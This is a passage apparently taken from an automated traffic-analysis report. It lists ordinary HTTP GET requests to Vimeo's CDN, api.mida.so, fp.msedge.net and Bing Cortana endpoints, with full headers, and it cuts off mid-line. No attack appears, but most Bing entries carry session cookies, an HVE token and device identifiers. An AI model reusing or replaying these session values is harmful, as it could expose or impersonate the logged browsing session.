                    Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=600&mh=337 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=600&mh=337 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /event/addv3 HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=r&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=9c4e8c753a3d4e7fadda4bc28511360c&ig=f4f3e497f6eb4eec930ca8b8785a48e6 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=9c4e8c753a3d4e7fadda4bc28511360c&ig=eb7d549459954dd39ed10936947be2fb HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
                    Source: global trafficHTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/hNxzr-RHKbwBAMICMusrEHvzZ7Q.css?bu=M-0K5grzCuYK1wvmCt0L5grmCuYK6AvmCu8L5gr1C-YK-wvmCoEM5gqFC-YKiwvmCv8K5grmCs4L5gqaC-YKoAvmCpQL5grmCrALswvmCuYKywu5C-YKvwvCC-YKrQzmCocM5groDA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdUM5grmCuYK5grmCuYK5grmCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/CRJMH8ar3a3tHOTBEOmE9-4tZPg.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/LLlskWvUCMmHCLUYuz8vSh87t6Y.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; 